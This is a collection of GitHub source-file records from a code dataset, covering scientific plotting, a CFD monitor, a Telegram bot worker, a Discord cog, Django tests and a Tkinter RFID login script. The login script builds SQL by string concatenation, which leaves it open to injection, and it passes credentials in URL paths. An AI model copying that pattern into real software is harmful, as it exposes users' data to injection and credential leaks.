plots, ...\n\"\"\"\n\nlog.basicConfig(level=log.INFO) # Set logging level\nos.environ[\"USE_N_CORES\"] = \"10\"\n\noutput_base = \"../../../output\"\nfit_output_base = \"{}/run_outputs\".format(output_base)\nmsr = IOMRR.get_default_mrr(fit_output_base)\n\n# Output directories\nplot_base = \"{}/plots\".format(output_base)\n\n# Set the default matplotlib formatting\nPDF.set_default_mpl_format()\n\n# Create summary plots for each result (using parallel programming)\nos.environ[\"USE_N_CORES\"] = \"4\" # Reduce the number of cores (goes crazy else)\npool = mp.Pool(MPCH.get_n_cores())\nresult_objects = []\n\nlog.info(\"Starting processes to create plots for each setup.\")\nfor res in tqdm(msr.setup_results):\n setup_out_name = IONC.setup_convention(res.lumi_setup, res.run_setup, \n res.muacc_setup, res.difparam_setup,\n res.WW_setup)\n log.debug(\"Checking: {}\".format(setup_out_name))\n \n # Calculate a summary of the result (e.g. cor matrix, unc., ...)\n res_summary = ARS.ResultSummary(res.run_result)\n \n # Create all the summary plots for this setup (in parallel process)\n plot_dir = \"{}/SingleSetup/{}\".format(plot_base,setup_out_name)\n result_objects.append(\n pool.apply_async(PSP.plot_res_summary, args=(res_summary,plot_dir)))\n \n# \"get\" the result to get a tqdm counter of them finishing\nlog.info(\"Running processes.\")\nfor r in tqdm(result_objects):\n _ = r.get()\n \n# Let all processes finish\npool.close()\npool.join()\nlog.info(\"Done!\")","repo_name":"beyerja/PrEWMultiSetupTest","sub_path":"analysis/py/Results/CreateIndividualSummaryPlots.py","file_name":"CreateIndividualSummaryPlots.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74585747113","text":"# -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-\n\ntop = '..'\n\ndef build(bld):\n\n for app in ['icear-ca', 'icear-mt']:\n bld(features='cxxprogram cxx',\n target='../bin/%s' % app,\n source=bld.path.ant_glob(['%s/*.cpp' % app]),\n use='ndn-cert')\n","repo_name":"danameme/ndncert","sub_path":"apps/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73285225833","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\n\nimport pandas as pd\nfrom PySide6.QtCore import QThread, QObject, QTimer, Signal, Qt\n\nfrom baramFlow.coredb import coredb\nfrom baramFlow.coredb.project import Project\nfrom baramFlow.coredb.monitor_db import MonitorDB\nfrom baramFlow.coredb.general_db import GeneralDB\nfrom baramFlow.coredb.run_calculation_db import RunCalculationDB\nfrom baramFlow.coredb.monitor_db import FieldHelper\nfrom baramFlow.coredb.boundary_db import BoundaryDB\nfrom baramFlow.coredb.cell_zone_db import CellZoneDB\nfrom baramFlow.openfoam.post_processing.post_file_reader import PostFileReader\n\n\ndef calculateMaxX():\n if GeneralDB.isTimeTransient():\n # 10% of total case time\n endTime = float(coredb.CoreDB().getValue(RunCalculationDB.RUN_CALCULATION_XPATH + '/runConditions/endTime'))\n maxX = endTime / 10\n else:\n # 10% of total iteration count or iteration count if it is less than MIN_COUNT\n MIN_COUNT = 100\n count = int(\n coredb.CoreDB().getValue(RunCalculationDB.RUN_CALCULATION_XPATH + '/runConditions/numberOfIterations'))\n if count < MIN_COUNT:\n maxX = count\n else:\n maxX = MIN_COUNT + count / 10\n\n return maxX\n\n\nclass Worker(QObject):\n dataUpdated = Signal(pd.DataFrame)\n stopped = Signal()\n flushed = Signal()\n\n def __init__(self, name):\n super().__init__()\n self._project = Project.instance()\n self._name = name\n self._reader = None\n self._timer = None\n\n def createReader(self, rname, fileName, extension):\n self._reader = PostFileReader(self._name, rname, fileName, extension)\n\n def startMonitor(self):\n changedFiles = self._reader.chagedFiles()\n while not changedFiles and self._project.isSolverRunning():\n time.sleep(0.5)\n changedFiles = self._reader.chagedFiles()\n\n if changedFiles:\n for path in changedFiles[1:]:\n data = self._reader.readDataFrame(path)\n self.dataUpdated.emit(data)\n\n self._reader.openMonitor()\n self._monitor()\n\n self.flushed.emit()\n\n if self._project.isSolverRunning():\n self._timer = QTimer()\n self._timer.setInterval(500)\n self._timer.timeout.connect(self._monitor)\n self._timer.start()\n else:\n self._reader.closeMonitor()\n\n def stopMonitor(self):\n if self._timer:\n self._timer.stop()\n self._timer = None\n self._monitor()\n self._reader.closeMonitor()\n self.stopped.emit()\n\n def _monitor(self):\n data = self._reader.readTailDataFrame()\n if data is not None:\n self.dataUpdated.emit(data)\n\nclass Monitor(QObject):\n startWorker = Signal()\n stopWorker = Signal()\n stopped = Signal(str)\n\n def __init__(self, name):\n super().__init__()\n\n self._db = coredb.CoreDB()\n self._name = name\n self._rname = ''\n self._thread = None\n self._worker = None\n self._showChart = True\n self._running = False\n\n @property\n def name(self):\n return self._name\n\n @property\n def fileName(self):\n return None\n\n @property\n def extension(self):\n return '.dat'\n\n def visibility(self):\n return self._showChart\n\n def startThread(self):\n self._thread = QThread()\n self._worker = Worker(self.name)\n self._worker.moveToThread(self._thread)\n self._worker.createReader(self._rname, self.fileName, self.extension)\n self._worker.dataUpdated.connect(self._updateChart, type=Qt.ConnectionType.QueuedConnection)\n self._worker.stopped.connect(self._stopped, type=Qt.ConnectionType.QueuedConnection)\n self._worker.flushed.connect(self._fitChart, type=Qt.ConnectionType.QueuedConnection)\n\n self._thread.started.connect(self._worker.startMonitor, type=Qt.ConnectionType.QueuedConnection)\n self._thread.start()\n\n self.startWorker.connect(self._worker.startMonitor, type=Qt.ConnectionType.QueuedConnection)\n self.stopWorker.connect(self._worker.stopMonitor, type=Qt.ConnectionType.QueuedConnection)\n\n def start(self):\n if self._worker:\n self.startWorker.emit()\n else:\n self.startThread()\n\n self._running = True\n\n def stop(self):\n self._running = False\n self.stopWorker.emit()\n\n def quit(self):\n self.stop()\n if self._thread:\n self._thread.quit()\n self._thread.wait()\n self._thread = None\n\n def _updateChart(self, data):\n pass\n\n def _fitChart(self):\n pass\n\n def _stopped(self):\n self.stopped.emit(self._name)\n\nclass ForceMonitor(Monitor):\n def __init__(self, name, chart1, chart2, chart3):\n super().__init__(name)\n\n xpath = MonitorDB.getForceMonitorXPath(name)\n\n self._showChart = self._db.getValue(xpath + '/showChart') == 'true'\n self._rname = self._db.getValue(xpath + '/region')\n self._chart1 = chart1\n self._chart2 = chart2\n self._chart3 = chart3\n\n chart1.setTitle(f'{name} - Cd')\n chart2.setTitle(f'{name} - Cl')\n chart3.setTitle(f'{name} - Cm')\n\n @property\n def fileName(self):\n return 'coefficient'\n\n def _updateChart(self, data):\n if self._running:\n self._chart1.appendData(pd.DataFrame(data, columns=['Cd']))\n self._chart2.appendData(pd.DataFrame(data, columns=['Cl']))\n self._chart3.appendData(pd.DataFrame(data, columns=['CmPitch']).rename(columns={'CmPitch': 'Cm'}))\n\n def _fitChart(self):\n if self._running:\n self._chart1.fitChart()\n self._chart2.fitChart()\n self._chart3.fitChart()\n\n\nclass PointMonitor(Monitor):\n def __init__(self, name, chart):\n super().__init__(name)\n\n self._xpath = MonitorDB.getPointMonitorXPath(name)\n\n self._showChart = self._db.getValue(self._xpath + '/showChart') == 'true'\n self._rname = '' # Working only for Single Region Cases. ToDo: find a region by using vtkStaticCellLocator\n self._chart = chart\n\n self._chart.setTitle(name)\n\n @property\n def fileName(self):\n return FieldHelper.DBFieldKeyToField(self._db.getValue(self._xpath + '/field/field'),\n self._db.getValue(self._xpath + '/field/mid'))\n\n @property\n def extension(self):\n return ''\n\n def _updateChart(self, data):\n if self._running:\n self._chart.appendData(data)\n\n def _fitChart(self):\n if self._running:\n self._chart.fitChart()\n\n\nclass SurfaceMonitor(Monitor):\n def __init__(self, name, chart):\n super().__init__(name)\n\n xpath = MonitorDB.getSurfaceMonitorXPath(name)\n\n self._showChart = self._db.getValue(xpath + '/showChart') == 'true'\n self._rname = BoundaryDB.getBoundaryRegion(self._db.getValue(xpath + '/surface'))\n self._chart = chart\n\n self._chart.setTitle(name)\n\n @property\n def fileName(self):\n return 'surfaceFieldValue'\n\n def _updateChart(self, data):\n if self._running:\n self._chart.appendData(data)\n\n def _fitChart(self):\n if self._running:\n self._chart.fitChart()\n\n\nclass VolumeMonitor(Monitor):\n def __init__(self, name, chart):\n super().__init__(name)\n\n xpath = MonitorDB.getVolumeMonitorXPath(name)\n\n self._showChart = self._db.getValue(xpath + '/showChart') == 'true'\n self._rname = CellZoneDB.getCellZoneRegion(self._db.getValue(xpath + '/volume'))\n self._chart = chart\n\n self._chart.setTitle(name)\n\n @property\n def fileName(self):\n return 'volFieldValue'\n\n def _updateChart(self, data):\n if self._running:\n self._chart.appendData(data)\n\n def _fitChart(self):\n if self._running:\n self._chart.fitChart()\n\n","repo_name":"nextfoam/baram","sub_path":"baramFlow/openfoam/post_processing/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":8081,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"24155970474","text":"from models import Task, Offer, MessageQueue\nfrom constants import *\nfrom sqlalchemy import and_, or_\nfrom global_web_instances import app, db\n\nimport telebot\n\nbot = telebot.TeleBot(BOT_TOKEN)\n\nclass TaskWorker():\n __instance = None\n\n @classmethod \n def getInstance(cls):\n \"\"\" Static access method. \"\"\"\n if TaskWorker.__instance == None:\n TaskWorker()\n\n return TaskWorker.__instance\n \n def __init__(self):\n if TaskWorker.__instance != None:\n raise Exception(\"This class is a singleton!\")\n else:\n TaskWorker.__instance = self\n\n def message_queue_create(self):\n # AUTOMATIC TASKS\n tasks = Task.query.filter( and_(\n Task.status == TASK_STATUS['APPROVED'],\n Task.taskType == TASK_TYPE['AUTOMATIC']\n )\n ).limit(30).all()\n\n for task in tasks:\n message_queue = MessageQueue()\n\n message_queue.create_message(task, postTime)\n\n task.change_status(TASK_STATUS['QUEUED'])\n\n # MANUAL TASKS\n #tasks_manual = Task.query.filter( and_(\n # Task.status == TASK_STATUS['APPROVED'],\n # Task.taskType == TASK_TYPE['MANUAL']\n #)\n #).limit(30).all()\n\n #for task in tasks_manual:\n #task.change_status(TASK_STATUS['SENDED'])\n # send link in private chat to MANUAL publishing\n # NOTIFICATION_WORKER\n #bot.send_message(task.user.username, botLink, 1)\n\n # depricated (in Kirill code?)\n def post_messages(self):\n message_queues = MessageQueue.query.filter(\n MessageQueue.status == MESSAGE_STATUS['NEW']\n ).limit(30).all()\n\n for message_queue in message_queues:\n task = message_queue.task\n offer = task.offer\n # link in private chat with Bot\n link = botLink\n\n message = task.previevText + link\n\n # send msg in all channels\n channels = Channel.query.filter(and_(partnerId=task.affilId, status='ACTIVE')).all()\n for channel in channels: \n if channel.categoryListAff.category.id == task.offer.categoryListAdv.category.id:\n chatId = -1001321811797 # test\n #chatId = channel.tgUrl\n bot.send_message(chatId, message, 1)\n\n message_queue.change_status(MESSAGE_STATUS['PUBLISHED'])\n \n\n def deactivate_adv_activity(self, adv):\n Offer.query.filter_by(advertId=adv).update({'status': 'INACTIVE'})\n offers = Offer.query.filter_by(advertId=adv).all()\n\n for offer in offers:\n Task.query.filter_by(offerId=offer.id).update({'status': TASK_STATUS['PAUSED']})\n tasks = Task.query.filter_by(offerId=offer.id).all()\n \n for task in tasks:\n MessageQueue.query.filter_by(taskId=task.id).update({'status': MESSAGE_STATUS['DEACTIVATED']})\n \n db.session.commit()\n\n\n def activate_adv_activity(self, adv):\n Offer.query.filter_by(advertId=adv).update({'status': 'ACTIVE'})\n offers = Offer.query.filter_by(advertId=adv).all()\n\n for offer in offers:\n Task.query.filter_by(offerId=offer.id).update({'status': TASK_STATUS['QUEUED']})\n tasks = Task.query.filter_by(offerId=offer.id).all()\n \n for task in tasks:\n MessageQueue.query.filter_by(taskId=task.id).update({'status': MESSAGE_STATUS['NEW']})\n \n db.session.commit()\n","repo_name":"kshilov/tcard","sub_path":"aff_network/task_worker.py","file_name":"task_worker.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41458333019","text":"#\n# @lc app=leetcode id=937 lang=python3\n#\n# [937] Reorder Data in Log Files\n#\n\n# @lc code=start\nclass Solution:\n def reorderLogFiles(self, logs: List[str]) -> List[str]:\n digs = list(filter(lambda x: x.split(' ')[1].isdecimal(), logs))\n lets = sorted(list(filter(lambda x: x.split(\n ' ')[1].isalpha(), logs)), key=lambda x: (' '.join(x.split(' ')[1:]), x.split(' ')[0]))\n\n return lets+digs\n# @lc code=end\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython2020/937.reorder-data-in-log-files.py","file_name":"937.reorder-data-in-log-files.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"4359663300","text":"import argparse\nfrom os import system\n\nparser = argparse.ArgumentParser(description='Installation script for \"Bot channel\\'s info\"')\nparser.add_argument('token', type=str, metavar='BOT_TOKEN', help='Bot api token')\nparser.add_argument('api_id', type=int, metavar='API_ID', help='Telegram API id')\nparser.add_argument('api_hash', type=str, metavar='API_HASH', help='Telegram API hash')\nparser.add_argument('secret_key', type=str, metavar='SECRET_KEY', help='Secret key for auth in bot')\n\nargs = parser.parse_args()\n\n\nwith open('pre_cfg.py', 'w') as f:\n lines = [\n f'TOKEN = \\'{args.token}\\'\\n',\n f'API_ID = {args.api_id}\\n',\n f'API_HASH = \\'{args.api_hash}\\'\\n',\n f'SECRET_KEY = \\'{args.secret_key}\\'\\n'\n ]\n f.writelines(lines)\n\nprint('Installed')\n","repo_name":"diSp1rIt/Bot-channels-info","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18136858754","text":"\"\"\"\nMake text in the last row of every table bold\n\"\"\"\n\nimport panflute as pf\n\n\ndef action(elem, doc):\n if isinstance(elem, pf.TableRow):\n # Exclude table headers (which are not in a list)\n if elem.index is None:\n return\n\n if elem.next is None:\n pf.debug(elem)\n elem.walk(make_emph)\n\n\ndef make_emph(elem, doc):\n if isinstance(elem, pf.Str):\n return pf.Emph(elem)\n\n\ndef main(doc=None):\n return pf.run_filter(action, doc=doc) \n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sergiocorreia/panflute","sub_path":"docs/source/_static/emph-last-row.py","file_name":"emph-last-row.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":468,"dataset":"github-code","pt":"72"} +{"seq_id":"74890464232","text":"import sqlite3\nfrom tkinter import *\nimport requests\nimport RPi.GPIO as GPIO\nfrom mfrc522 import SimpleMFRC522\n\n\ndef formSaisie():\n window = Tk()\n \n l1 = Label (window, text =\"identifient\")\n l1.pack()\n \n v1 = StringVar()\n v1.set(\"jeanne\")\n e1 = Entry(window,textvariable=v1)\n e1.pack()\n \n l2 = Label (window, text =\"mot de passe\")\n l2.pack()\n \n v2 = StringVar()\n v2.set(\"jeanne\")\n e2 = Entry(window,textvariable=v2)\n e2.pack()\n \n b1 = Button(window, text=\"OK\", command=lambda:verifId(window,e1.get(),e2.get()))\n b1.pack()\n \n b2 = Button(window, text=\"cancel\", command=window.destroy)\n b2.pack()\n \n window.mainloop()\n \ndef formBadge(nom):\n windowx = Tk()\n l3 = Label (windowx, text =\"passer votre badge\")\n l3.pack()\n \n #reader = SimpleMFRC522()\n #try:\n # id1, text = reader.read()\n # print(id)\n # print(text)\n #finally:\n # GPIO.cleanup()\n id1 = 996305625869\n b3 = Button(windowx, text=\"OK\", command=lambda:verifBadge(id1,nom, windowx))\n b3.pack()\n \ndef formRecoFacial():\n print(\"test\")\n \ndef verifBadge(id1, nom, windowx):\n api_root=\"https://www.btssio-carcouet.fr/ppe4/public/badge/\"+nom+\"/\"+str(id1)\n req = requests.get(api_root)\n wb = req.json()\n print(wb)\n if wb['status'] == \"true\" :\n print(\"ok\")\n windowx.destroy()\n formRecoFacial()\n else :\n print(\"error\")\ndef verifId(window,e1,e2):\n api_root=\"https://www.btssio-carcouet.fr/ppe4/public/connect2/\"+e1+\"/\"+e2+\"/infirmiere\"\n req = requests.get(api_root)\n wb = req.json()\n print(wb)\n if not ('status' in wb is False):\n print(\"ok\")\n window.destroy()\n formBadge(wb['nom'])\n else :\n print(\"error\")\n \ndef MaBase(numPhase, identifient, numBadge, commentaire):\n con = sqlite3.connect('kliemie.db')\n c = con.cursor()\n c.execute(\"insert into logAcces(numPhase,identifiant,numBadge,commentaire) VALUES (\"+str(numPhase)+\",'\"+identifient+\"','\"+numBadge+\"','\"+commentaire+\"');\")\n con.commit()\n\nformSaisie()\n","repo_name":"LeLouPhoque/recoOpenCV","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16491262016","text":"from flask import Flask,render_template\nfrom .xls.read_xls import get_card\n\napp = Flask(__name__)\n@app.route(\"/\")\ndef top_page():\n return \"Top Page\"\n\n@app.route(\"/card/\")\ndef card(num):\n card_num = int(num)\n card_num = abs(card_num)\n card = get_card(card_num)\n return render_template(\"card.html\",card=card)\n\n@app.route(\"/cards\")\ndef cards():\n cards = [get_card(i+1) for i in range(100)]\n return render_template(\"cards.html\",cards=cards)","repo_name":"s-n-1-0/circ-cl","sub_path":"card_flask/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70513163754","text":"############\n#\nfrom importlib import reload\n\nfrom discord import PartialEmoji\nfrom discord.ext.commands import Cog, guild_only, hybrid_command, is_owner\n\nfrom Classes import ShakeBot, ShakeContext, Testing, _, extras, locale_doc, setlocale\n\nfrom ..information import Information\nfrom . import testing, vote\n\n\n########\n#\nclass vote_extension(Information):\n def __init__(self, bot: ShakeBot) -> None:\n super().__init__(bot=bot)\n try:\n reload(vote)\n except:\n pass\n\n @property\n def display_emoji(self) -> PartialEmoji:\n return PartialEmoji(name=\"\\N{CROWN}\")\n\n @hybrid_command(name=\"vote\")\n @extras(beta=True, owner=True)\n @guild_only()\n @is_owner()\n @setlocale()\n @locale_doc\n async def vote(self, ctx: ShakeContext):\n _(\n \"\"\"Get information about Shake+.\n\n Of course, you dont have to. It's like a tip\"\"\"\n )\n\n if ctx.testing:\n try:\n reload(testing)\n except Exception as e:\n await self.bot.testing_error(module=testing, error=e)\n ctx.testing = False\n do = testing if ctx.testing else vote\n\n try:\n await do.command(ctx=ctx).__await__()\n\n except:\n if ctx.testing:\n raise Testing\n raise\n\n\nasync def setup(bot: ShakeBot):\n await bot.add_cog(vote_extension(bot))\n\n\n#\n############\n","repo_name":"Shake-The-Bot/Source","sub_path":"Extensions/Commands/Information/vote/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"465312639","text":"# coding: utf-8\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport json\n\nimport pytest\nfrom django.test import Client\nfrom hamcrest import has_entries, assert_that, contains_inanyorder, contains\n\nfrom common.data_api.baris.test_helpers import mock_baris_response\nfrom common.models.transport import TransportType\nfrom common.tester.factories import create_station, create_company, create_settlement, create_transport_model\nfrom common.tester.utils.datetime import replace_now\n\n\npytestmark = [pytest.mark.dbuser]\n\ncreate_plane_station = create_station.mutate(t_type=TransportType.PLANE_ID, type_choices='tablo')\n\n\n@replace_now('2020-06-01')\n@pytest.mark.parametrize('yandex_avia_code, expected_url', [\n ('su_aeroflot', 'https://travel-test.yandex.ru/avia/airline/su_aeroflot/?utm_medium=rasp_airline&utm_source=rasp'),\n ('', None),\n (None, None)\n])\ndef test_company_yandex_avia_url(yandex_avia_code, expected_url):\n station_from = create_plane_station(id=101)\n station_to = create_plane_station(id=102)\n create_company(yandex_avia_code=yandex_avia_code, id=301)\n\n with mock_baris_response({\n 'flights': [{\n 'airlineID': 301,\n 'departureStation': 101,\n 'arrivalStation': 102,\n 'title': 'SU 1',\n 'route': [101, 102],\n 'transportModelID': 201,\n 'departureDatetime': '2020-06-01T01:30:00+05:00',\n 'arrivalDatetime': '2020-06-01T05:00:00+05:00',\n }]\n }):\n response = json.loads(Client().get('/ru/search/search/', {\n 'national_version': 'ru',\n 'pointFrom': station_from.point_key,\n 'pointTo': station_to.point_key,\n 'when': '2020-06-01',\n 'transportType': 'plane'\n }).content)\n\n assert_that(response['result']['segments'], contains_inanyorder(\n has_entries({\n 'company': has_entries({\n 'yandexAviaUrl': expected_url,\n })\n }),\n ))\n\n\ndef _create_db_items():\n settlement1 = create_settlement(id=91, title='От', slug='ot', time_zone='Etc/GMT-3')\n settlement2 = create_settlement(id=92, title='До', slug='do', time_zone='Etc/GMT-5')\n create_plane_station(id=100, title='Раньше')\n create_plane_station(id=101, settlement=settlement1, time_zone='Etc/GMT-3', title='от')\n create_plane_station(id=102, settlement=settlement2, time_zone='Etc/GMT-5', title='до')\n create_company(id=301, title='Компания1', url='url1', yandex_avia_code='Company1')\n create_company(id=302, title='Компания2', url='url2', yandex_avia_code='Company2')\n create_transport_model(id=201, title='Самолет1')\n\n\nONE_DAY_P2P_BARIS_RESPONSE = {\n 'departureStations': [101],\n 'arrivalStations': [102],\n 'flights': [\n {\n 'airlineID': 301,\n 'title': 'SU 1',\n 'departureDatetime': '2020-06-01T01:30:00+03:00',\n 'departureTerminal': 'A',\n 'departureStation': 101,\n 'arrivalDatetime': '2020-06-01T05:00:00+05:00',\n 'arrivalTerminal': '',\n 'arrivalStation': 102,\n 'transportModelID': 201,\n 'codeshares': [{\n 'airlineID': 302,\n 'title': 'SV 1'\n }],\n 'route': [100, 101, 102],\n 'source': 'flight-board',\n }\n ]\n}\n\n\n@replace_now('2020-06-01')\n@pytest.mark.parametrize('nearest, latest_datetime, when', [\n (False, '2020-06-02T01:00:00+00:00', '2020-06-01'),\n (False, '2020-06-02T01:00:00+00:00', 'today'),\n (True, '2020-05-31T22:30:00+00:00', None)\n])\ndef test_baris_one_day_search(nearest, latest_datetime, when):\n _create_db_items()\n\n with mock_baris_response(ONE_DAY_P2P_BARIS_RESPONSE):\n search_params = {\n 'national_version': 'ru',\n 'transportType': 'plane',\n 'pointFrom': 'c91',\n 'pointTo': 'c92',\n 'nearest': nearest,\n }\n if not nearest:\n search_params['when'] = when\n\n response = Client().get('/ru/search/search/', search_params)\n\n if nearest:\n assert response.data['result']['canonical'] is None\n else:\n assert_that(response.data['result']['canonical'], has_entries({\n 'transportType': 'plane',\n 'pointFrom': 'ot',\n 'pointTo': 'do',\n }))\n\n assert_that(response.data['result'], has_entries({\n 'archivalData': None,\n 'context': has_entries({\n 'transportTypes': ['plane'],\n 'isChanged': False,\n 'latestDatetime': latest_datetime,\n 'search': has_entries({\n 'nearest': nearest,\n 'pointFrom': has_entries({\n 'titleWithType': 'г. От',\n 'title': 'От',\n 'key': 'c91',\n 'slug': 'ot',\n }),\n 'pointTo': has_entries({\n 'titleWithType': 'г. До',\n 'title': 'До',\n 'key': 'c92',\n 'slug': 'do',\n })\n }),\n 'original': has_entries({\n 'nearest': nearest,\n 'pointFrom': has_entries({\n 'titleWithType': 'г. От',\n 'title': 'От',\n 'key': 'c91',\n 'slug': 'ot',\n }),\n 'pointTo': has_entries({\n 'titleWithType': 'г. До',\n 'title': 'До',\n 'key': 'c92',\n 'slug': 'do',\n })\n })\n }),\n\n 'segments': contains(\n has_entries({\n 'departure': '2020-05-31T22:30:00+00:00',\n 'arrival': '2020-06-01T00:00:00+00:00',\n 'departureLocalDt': '2020-06-01T01:30:00+03:00',\n 'arrivalLocalDt': '2020-06-01T05:00:00+05:00',\n 'startDate': '2020-06-01',\n 'departureEvent': None,\n 'thread': has_entries({\n 'number': 'SU 1',\n 'title': 'Раньше \\u2013 До',\n 'comment': '',\n 'uid': '',\n 'density': '',\n 'beginTime': None,\n 'endTime': None,\n 'schedulePlanCode': None,\n 'isAeroExpress': False,\n 'isExpress': False,\n 'isBasic': True\n }),\n 'isThroughTrain': False,\n 'title': 'Раньше \\u2013 До',\n 'company': has_entries({\n 'title': 'Компания1',\n 'url': 'url1',\n 'yandexAviaUrl': 'https://travel-test.yandex.ru/avia/airline/Company1/?utm_medium=rasp_airline&utm_source=rasp',\n 'hidden': False,\n 'id': 301\n }),\n 'suburbanFacilities': None,\n 'number': 'SU 1',\n 'stops': '',\n 'departureEventKey': None,\n 'isInterval': False,\n 'tariffsKeys': ['SU 1'] if nearest else ['daemon SU-1 0601'],\n 'stationFrom': has_entries({\n 'settlementId': 91,\n 'title': 'от',\n 'id': 101\n }),\n 'stationTo': has_entries({\n 'settlementId': 92,\n 'title': 'до',\n 'id': 102\n }),\n 'duration': 5400,\n 'arrivalEvent': None,\n 'arrivalEventKey': None,\n 'transport': has_entries({\n 'model': {'title': 'Самолет1'},\n 'code': 'plane',\n 'id': 2,\n 'title': 'Самолёт'\n })\n })\n )\n }))\n\n if not nearest:\n assert_that(response.data['result']['segments'][0]['codeshares'][0], has_entries({\n 'number': 'SV 1',\n 'tariffsKeys': ['daemon SV-1 0601'],\n 'company': has_entries({\n 'title': 'Компания2',\n 'url': 'url2',\n 'yandexAviaUrl': 'https://travel-test.yandex.ru/avia/airline/Company2/?utm_medium=rasp_airline&utm_source=rasp',\n 'hidden': False,\n 'id': 302\n }),\n }))\n\n\nALL_DAYS_P2P_BARIS_RESPONSE = {\n 'departureStations': [101],\n 'arrivalStations': [102],\n 'flights': [\n {\n 'airlineID': 301,\n 'title': 'SU 1',\n 'departureTime': '01:30',\n 'departureTimezone': '+0300',\n 'departureStation': 101,\n 'arrivalTime': '05:00',\n 'arrivalTimezone': '+0500',\n 'arrivalStation': 102,\n 'arrivalDayShift': 0,\n 'transportModelID': 201,\n 'codeshares': [{\n 'airlineID': 302,\n 'title': 'SV 1'\n }],\n 'route': [100, 101, 102],\n 'source': 'flight-board',\n 'masks': [\n {\n 'from': '2020-06-01',\n 'until': '2020-06-30',\n 'on': 2\n }\n ]\n }\n ]\n}\n\n\n@replace_now('2020-06-01')\ndef test_baris_all_days_search():\n _create_db_items()\n\n with mock_baris_response(ALL_DAYS_P2P_BARIS_RESPONSE):\n search_params = {\n 'national_version': 'ru',\n 'transportType': 'plane',\n 'pointFrom': 'c91',\n 'pointTo': 'c92',\n }\n\n response = Client().get('/ru/search/search/', search_params)\n\n assert_that(response.data['result'], has_entries({\n 'canonical': has_entries({\n 'transportType': 'plane',\n 'pointFrom': 'ot',\n 'pointTo': 'do',\n }),\n 'archivalData': None,\n 'context': has_entries({\n 'transportTypes': ['plane'],\n 'isChanged': False,\n 'latestDatetime': None,\n 'search': has_entries({\n 'nearest': False,\n 'pointFrom': has_entries({\n 'titleWithType': 'г. От',\n 'title': 'От',\n 'key': 'c91',\n 'slug': 'ot',\n }),\n 'pointTo': has_entries({\n 'titleWithType': 'г. До',\n 'title': 'До',\n 'key': 'c92',\n 'slug': 'do',\n })\n }),\n 'original': has_entries({\n 'nearest': False,\n 'pointFrom': has_entries({\n 'titleWithType': 'г. От',\n 'title': 'От',\n 'key': 'c91',\n 'slug': 'ot',\n }),\n 'pointTo': has_entries({\n 'titleWithType': 'г. До',\n 'title': 'До',\n 'key': 'c92',\n 'slug': 'do',\n })\n })\n }),\n\n 'segments': contains(\n has_entries({\n 'departure': '2020-06-01T22:30:00+00:00',\n 'arrival': '2020-06-02T00:00:00+00:00',\n 'departureLocalDt': '2020-06-02T01:30:00+03:00',\n 'arrivalLocalDt': '2020-06-02T05:00:00+05:00',\n 'startDate': '2020-06-02',\n 'daysByTimezone': {\n 'Etc/GMT-3': {'text': '2, 9, 16, 23, 30 июня'}\n },\n 'runDays': {\n '2020': {\n '6': [\n 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1\n ]\n }\n },\n 'departureEvent': None,\n 'thread': has_entries({\n 'number': 'SU 1',\n 'title': 'Раньше \\u2013 До',\n 'comment': '',\n 'uid': '',\n 'density': '',\n 'beginTime': None,\n 'endTime': None,\n 'schedulePlanCode': None,\n 'isAeroExpress': False,\n 'isExpress': False,\n 'isBasic': True\n }),\n 'isThroughTrain': False,\n 'title': 'Раньше \\u2013 До',\n 'company': has_entries({\n 'title': 'Компания1',\n 'url': 'url1',\n 'yandexAviaUrl': 'https://travel-test.yandex.ru/avia/airline/Company1/?utm_medium=rasp_airline&utm_source=rasp',\n 'hidden': False,\n 'id': 301\n }),\n 'suburbanFacilities': None,\n 'number': 'SU 1',\n 'stops': '',\n 'departureEventKey': None,\n 'isInterval': False,\n 'tariffsKeys': ['SU 1'],\n 'stationFrom': has_entries({\n 'settlementId': 91,\n 'title': 'от',\n 'id': 101\n }),\n 'stationTo': has_entries({\n 'settlementId': 92,\n 'title': 'до',\n 'id': 102\n }),\n 'duration': 5400,\n 'arrivalEvent': None,\n 'arrivalEventKey': None,\n 'transport': has_entries({\n 'model': {'title': 'Самолет1'},\n 'code': 'plane',\n 'id': 2,\n 'title': 'Самолёт'\n })\n })\n )\n }))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/search/search/views/test_baris_search_view.py","file_name":"test_baris_search_view.py","file_ext":"py","file_size_in_byte":14776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19841955789","text":"import os\nimport time\nimport 